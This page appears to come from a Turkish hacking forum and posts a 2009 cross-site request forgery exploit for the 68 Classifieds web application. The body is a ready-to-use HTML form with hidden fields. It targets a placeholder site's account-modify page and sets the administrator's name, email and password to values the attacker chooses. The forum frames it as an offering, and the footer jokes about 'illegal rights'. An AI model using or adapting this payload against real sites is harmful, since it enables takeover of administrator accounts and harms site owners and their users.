ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> 68 Classifieds ~ XSRF Vuln.
68 Classifieds ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers/CWCaspeR
Date :
04.11.2009 23:56:23
#
68 Classifieds ~ XSRF Vuln.
[Full Screen Display]
< ------------------- header data start ------------------- > ############################################################# # Application Name : 68 Classifieds # Vulnerable Type : XSRF # Infection : Administrator Profile Bilgileri Change Edilebilir. # author : CWCaspeR - Bug Researchers # Demo : http://demo.68classifieds.com/v4.1/useraccountmodify.php ############################################################# < ------------------- header data end of ------------------- > <form action=http://HEDEFSITE.com/SCRIPTYOLU/useraccountmodify.php id=form name=login method=POST> <input class=required name=firstname type=hiddent id=firstname value=admin size=35 /> <input class=required name=lastname type=hidden id=lastname value=admin size=35 /> <input class=required name=address type=hidden id=address value=123 My Street size=35 /> <input class=required name=city type=hidden id=city value=Belmont size=35 /> <input type=hidden name=state value=Alabama> <input type=hidden name=country value=Canada> <input class=required name=zip type=hidden id=zip value=28012 size=35 /> <input class=required name=phone type=hidden id=phone value=7048251111 size=35 /> <input name=email class=required email type=hidden id=email value=support@example.com size=35 /> <input name=emailconfirm type=hidden equalTo=#email id=emailconfirm value= size=35 /> <input type=hidden id=newsletter name=newsletter value=Y /> <input name=password type=hidden id=password size=35 value=SIFRENIZ /> <input name=passwordconfirm equalTo=#password type=hidden id=passwordconfirm size=35 value=SIFRENIZ /> <input name=action type=hidden id=action value=modify /> <input name=submit type=submit id=submit value=buTONADI /> </form> < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©
